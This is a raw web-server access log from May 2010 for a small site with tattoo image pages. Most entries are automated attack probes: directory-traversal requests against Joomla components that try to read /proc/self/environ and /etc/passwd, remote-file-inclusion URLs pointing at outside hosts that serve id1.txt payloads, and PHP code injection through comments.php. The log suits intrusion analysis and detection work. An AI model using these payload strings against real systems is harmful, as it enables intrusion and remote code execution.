67.205.67.235 - - [08/May/2010:00:44:25 -0500] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""oi"
67.205.67.235 - - [08/May/2010:00:44:26 -0500] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""oi"
67.205.67.235 - - [08/May/2010:00:44:26 -0500] "GET /logs/access_log.1205452800/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""oi"
67.205.67.235 - - [08/May/2010:00:45:19 -0500] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""oi"
67.205.67.235 - - [08/May/2010:00:45:20 -0500] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""oi"
67.205.67.235 - - [08/May/2010:00:45:21 -0500] "GET /logs/access_log.1222473600/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""oi"
67.205.67.235 - - [08/May/2010:00:45:33 -0500] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""oi"
67.205.67.235 - - [08/May/2010:00:45:33 -0500] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""oi"
67.205.67.235 - - [08/May/2010:00:45:34 -0500] "GET /logs/access_log.1237852800/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""oi"
67.205.67.235 - - [08/May/2010:00:45:35 -0500] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""oi"
67.205.67.235 - - [08/May/2010:00:45:36 -0500] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""oi"
67.205.67.235 - - [08/May/2010:00:45:36 -0500] "GET /logs/access_log.1227484800/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""oi"
67.205.67.235 - - [08/May/2010:00:45:49 -0500] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""oi"
67.205.67.235 - - [08/May/2010:00:45:50 -0500] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""oi"
67.205.67.235 - - [08/May/2010:00:45:50 -0500] "GET /logs/access_log.1229731200/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""oi"
67.205.67.235 - - [08/May/2010:00:45:56 -0500] "GET /logs/access_log.1270857600/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""oi"
67.205.67.235 - - [08/May/2010:00:46:28 -0500] "GET /logs/access_log.1217808000/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""oi"
67.205.67.235 - - [08/May/2010:00:46:46 -0500] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""oi"
67.205.67.235 - - [08/May/2010:00:46:46 -0500] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""oi"
67.205.67.235 - - [08/May/2010:00:46:47 -0500] "GET /logs/access_log.1222473600/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""oi"
207.46.204.229 - - [08/May/2010:00:46:50 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.229 - - [08/May/2010:00:46:50 -0500] "GET /logs/access_log.1157673600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.205.67.235 - - [08/May/2010:00:47:16 -0500] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""oi"
67.205.67.235 - - [08/May/2010:00:47:20 -0500] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""oi"
67.205.67.235 - - [08/May/2010:00:47:20 -0500] "GET /logs/access_log.1218499200/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""oi"
124.122.173.229 - - [08/May/2010:00:47:22 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 32768 "http://www.google.co.th/imglanding?q=tattoo%20line&imgurl=http://www.aaglobalind.com/images/retail-temporary-tattoos/novelty-temporary-tattoos/novelty-temporary-tattoos-images/F42002-Kids-Next-Door-Tattoo-Sheet.jpg&imgrefurl=http://www.aaglobalind.com/retail-products/retail-temporary-tattoos/novelty-temporary-tattoos/F42002-kids-next-door-temporary-tattoos-novelty-pack.htm&usg=__DI475_odkKJNOrIGj0JoibBX_Zk=&h=266&w=325&sz=38&hl=th&itbs=1&tbnid=G-EU8PEfm09kQM:&tbnh=97&tbnw=118&prev=/images%3Fq%3Dtattoo%2Bline%26start%3D42%26tbnid%3D75VNaBxl6_FUaM%26tbnh%3D133%26tbnw%3D133%26hl%3Dth%26sa%3DN%26imgurl%3Dhttp://images.paraorkut.com/img/pics/images/t/tribal_tattoos-12067.jpg%26imgrefurl%3Dhttp://www.graphicshunt.com/images/tribal_tattoos-12067.htm%26h%3D550%26w%3D550%26sz%3D81%26gbv%3D2%26imgtype%3Di_similar%26ndsp%3D21%26tbs%3Disch:1&start=38&tbnid=75VNaBxl6_FUaM&tbnh=133&tbnw=133&sa=N&imgurl=http://images.paraorkut.com/img/pics/images/t/tribal_tattoos-12067.jpg&imgrefurl=http://www.graphicshunt.com/images/tribal_tattoos-12067.htm&h=550&w=550&sz=81&gbv=2&imgtype=i_similar&ndsp=21&tbs=isch:1""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; AskTB5.6)"
222.236.47.182 - - [08/May/2010:00:47:33 -0500] "GET /logs/access_log.1266019200/foro/?sourcedir=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
67.205.67.235 - - [08/May/2010:00:48:08 -0500] "GET /logs/access_log.1212451200/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""oi"
222.236.47.182 - - [08/May/2010:00:48:08 -0500] "GET /logs/access_log.1266019200/foro/?sourcedir=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
216.129.119.11 - - [08/May/2010:00:49:11 -0500] "GET /logs/access_log.1253923200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.205.67.235 - - [08/May/2010:00:50:29 -0500] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""oi"
67.205.67.235 - - [08/May/2010:00:50:30 -0500] "GET /logs/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""oi"
67.205.67.235 - - [08/May/2010:00:50:30 -0500] "GET /logs/access_log.1227484800/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""oi"
67.205.67.235 - - [08/May/2010:00:51:03 -0500] "GET /logs/access_log.1237852800/index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""oi"
119.235.18.119 - - [08/May/2010:00:52:18 -0500] "GET /logs/access_log.1272067200/option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 414 "-""libwww-perl/5.831"
119.235.18.119 - - [08/May/2010:00:52:23 -0500] "GET /option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 387 "-""libwww-perl/5.831"
119.235.18.119 - - [08/May/2010:00:52:29 -0500] "GET /logs/option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 392 "-""libwww-perl/5.831"
87.250.255.243 - - [08/May/2010:00:52:42 -0500] "GET /logs/access_log.1254873600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
216.7.185.19 - - [08/May/2010:00:52:59 -0500] "GET /?option=com_google&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""oi"
216.7.185.19 - - [08/May/2010:00:52:59 -0500] "GET /logs/?option=com_google&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4749 "-""oi"
216.7.185.19 - - [08/May/2010:00:52:59 -0500] "GET /logs/access_log.1263945600/?option=com_google&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""oi"
216.7.185.19 - - [08/May/2010:00:54:40 -0500] "GET /?option=com_google&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""oi"
216.7.185.19 - - [08/May/2010:00:54:40 -0500] "GET /logs/?option=com_google&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4749 "-""oi"
216.7.185.19 - - [08/May/2010:00:54:40 -0500] "GET /logs/access_log.1263945600/?option=com_google&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""oi"
67.205.67.235 - - [08/May/2010:00:55:15 -0500] "GET /?option=com_google&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""oi"
67.205.67.235 - - [08/May/2010:00:55:15 -0500] "GET /logs/?option=com_google&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4749 "-""oi"
67.205.67.235 - - [08/May/2010:00:55:15 -0500] "GET /logs/access_log.1263945600/?option=com_google&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""oi"
64.251.10.117 - - [08/May/2010:00:56:09 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.834"
64.251.10.117 - - [08/May/2010:00:56:09 -0500] "GET ///index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.834"
64.251.10.117 - - [08/May/2010:00:56:09 -0500] "GET /logs///index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.834"
216.7.185.19 - - [08/May/2010:00:56:44 -0500] "GET /?option=com_google&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""oi"
216.7.185.19 - - [08/May/2010:00:56:44 -0500] "GET /logs/?option=com_google&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4749 "-""oi"
216.7.185.19 - - [08/May/2010:00:56:44 -0500] "GET /logs/access_log.1263945600/?option=com_google&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""oi"
119.235.18.119 - - [08/May/2010:00:57:04 -0500] "GET /box_display.php?box=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
112.78.7.41 - - [08/May/2010:00:57:46 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
112.78.7.41 - - [08/May/2010:00:57:46 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
112.78.7.41 - - [08/May/2010:00:57:50 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
67.205.67.235 - - [08/May/2010:00:58:46 -0500] "GET /?option=com_google&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""oi"
67.205.67.235 - - [08/May/2010:00:58:46 -0500] "GET /logs/?option=com_google&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4749 "-""oi"
67.205.67.235 - - [08/May/2010:00:58:46 -0500] "GET /logs/access_log.1263945600/?option=com_google&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""oi"
216.7.185.19 - - [08/May/2010:00:59:06 -0500] "GET /?option=com_google&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""oi"
216.7.185.19 - - [08/May/2010:00:59:07 -0500] "GET /logs/?option=com_google&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4749 "-""oi"
216.7.185.19 - - [08/May/2010:00:59:08 -0500] "GET /logs/access_log.1263945600/?option=com_google&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""oi"
216.7.185.19 - - [08/May/2010:00:59:30 -0500] "GET /?option=com_google&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""oi"
216.7.185.19 - - [08/May/2010:00:59:31 -0500] "GET /logs/?option=com_google&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4749 "-""oi"
216.7.185.19 - - [08/May/2010:00:59:31 -0500] "GET /logs/access_log.1263945600/?option=com_google&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""oi"
67.205.67.235 - - [08/May/2010:00:59:43 -0500] "GET /?option=com_google&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""oi"
67.205.67.235 - - [08/May/2010:00:59:43 -0500] "GET /logs/?option=com_google&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4749 "-""oi"
67.205.67.235 - - [08/May/2010:00:59:44 -0500] "GET /logs/access_log.1263945600/?option=com_google&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""oi"
67.195.112.180 - - [08/May/2010:01:00:10 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [08/May/2010:01:00:10 -0500] "GET /logs/access_log.1206403200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [08/May/2010:01:00:30 -0500] "GET /logs/access_log.1256947200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
112.78.7.41 - - [08/May/2010:01:02:14 -0500] "GET /logs/access_log.1272067200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
112.78.7.41 - - [08/May/2010:01:02:14 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
112.78.7.41 - - [08/May/2010:01:02:15 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
67.195.112.180 - - [08/May/2010:01:08:00 -0500] "GET /logs/access_log.1206576000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.232.85.247 - - [08/May/2010:01:10:05 -0500] "GET /index.php?redir=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.232.85.247 - - [08/May/2010:01:10:05 -0500] "GET /logs/index.php?redir=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
211.232.85.247 - - [08/May/2010:01:10:05 -0500] "GET /logs/access_log.1228089600%20%20/index.php?redir=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
87.250.255.243 - - [08/May/2010:01:12:00 -0500] "GET /logs/access_log.1255392000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.200 - - [08/May/2010:01:12:39 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
119.235.18.119 - - [08/May/2010:01:18:16 -0500] "GET /logs/access_log.1272067200/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
119.235.18.119 - - [08/May/2010:01:18:18 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
119.235.18.119 - - [08/May/2010:01:18:20 -0500] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
123.125.68.79 - - [08/May/2010:01:19:22 -0500] "GET /tattoo/links.htm HTTP/1.1" 200 1325 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
222.122.52.80 - - [08/May/2010:01:19:54 -0500] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig.absolute.path=http://d32n.ucoz.com/id1.txt? HTTP/1.1" 404 358 "-""Mozilla/5.0"
222.122.52.80 - - [08/May/2010:01:19:54 -0500] "GET /logs/access_log.1262390400//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig.absolute.path=http://d32n.ucoz.com/id1.txt? HTTP/1.1" 404 385 "-""Mozilla/5.0"
222.122.52.80 - - [08/May/2010:01:19:54 -0500] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig.absolute.path=http://d32n.ucoz.com/id1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
87.250.255.243 - - [08/May/2010:01:24:12 -0500] "GET /logs/access_log.1272844800 HTTP/1.1" 200 451290 "-""Yandex/1.01.001 (compatible; Win16; I)"
222.122.52.80 - - [08/May/2010:01:24:19 -0500] "GET /logs/access_log.1262390400//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig.absolute.path=http://d32n.ucoz.com/id1.txt? HTTP/1.1" 404 385 "-""Mozilla/5.0"
222.122.52.80 - - [08/May/2010:01:24:19 -0500] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig.absolute.path=http://d32n.ucoz.com/id1.txt? HTTP/1.1" 404 358 "-""Mozilla/5.0"
222.122.52.80 - - [08/May/2010:01:24:19 -0500] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig.absolute.path=http://d32n.ucoz.com/id1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
209.172.33.203 - - [08/May/2010:01:28:45 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 302 "-""Mozilla/5.0"
209.172.33.203 - - [08/May/2010:01:28:45 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 297 "-""Mozilla/5.0"
209.172.33.203 - - [08/May/2010:01:28:45 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
209.172.33.203 - - [08/May/2010:01:28:46 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 302 "-""Mozilla/5.0"
209.172.33.203 - - [08/May/2010:01:28:46 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 297 "-""Mozilla/5.0"
209.172.33.203 - - [08/May/2010:01:28:46 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
91.121.12.17 - - [08/May/2010:01:29:47 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 297 "-""Mozilla/5.0"
91.121.12.17 - - [08/May/2010:01:29:47 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
91.121.12.17 - - [08/May/2010:01:29:47 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 302 "-""Mozilla/5.0"
91.121.12.17 - - [08/May/2010:01:29:48 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 297 "-""Mozilla/5.0"
91.121.12.17 - - [08/May/2010:01:29:48 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 302 "-""Mozilla/5.0"
91.121.12.17 - - [08/May/2010:01:29:48 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
209.172.33.203 - - [08/May/2010:01:30:49 -0500] "GET /logs/access_log.1237852800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
62.44.82.61 - - [08/May/2010:01:30:53 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
62.44.82.61 - - [08/May/2010:01:30:53 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 302 "-""Mozilla/5.0"
62.44.82.61 - - [08/May/2010:01:30:53 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 297 "-""Mozilla/5.0"
209.172.33.203 - - [08/May/2010:01:30:54 -0500] "GET /logs/access_log.1237852800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
91.121.12.17 - - [08/May/2010:01:32:01 -0500] "GET /logs/access_log.1237852800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
209.172.33.203 - - [08/May/2010:01:32:04 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
209.172.33.203 - - [08/May/2010:01:32:05 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
91.121.12.17 - - [08/May/2010:01:32:14 -0500] "GET /logs/access_log.1237852800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
91.121.12.17 - - [08/May/2010:01:33:13 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
87.250.255.243 - - [08/May/2010:01:33:28 -0500] "GET /logs/access_log.1252281600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.90 - - [08/May/2010:01:33:50 -0500] "GET /logs/access_log.1210291200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.121.12.17 - - [08/May/2010:01:33:56 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
62.44.82.61 - - [08/May/2010:01:34:08 -0500] "GET /logs/access_log.1223683200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
62.44.82.61 - - [08/May/2010:01:37:13 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://tadutaf.com/modules//id1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
92.241.190.214 - - [08/May/2010:01:39:57 -0500] "GET /logs/access_log.1264550400/?sourcedir=http://doitinbergen.com/.logs???? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
92.241.190.214 - - [08/May/2010:01:39:57 -0500] "GET /?sourcedir=http://doitinbergen.com/.logs???? HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
92.241.190.214 - - [08/May/2010:01:39:58 -0500] "GET /logs/?sourcedir=http://doitinbergen.com/.logs???? HTTP/1.1" 200 4749 "-""libwww-perl/5.805"
123.28.62.15 - - [08/May/2010:01:39:59 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://www.bing.com/search?q=flash+tattoo&src=IE-Address&first=421&FORM=PERE4""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)"
123.28.62.15 - - [08/May/2010:01:39:59 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)"
123.28.62.15 - - [08/May/2010:01:40:00 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)"
123.28.62.15 - - [08/May/2010:01:40:00 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)"
123.28.62.15 - - [08/May/2010:01:40:00 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)"
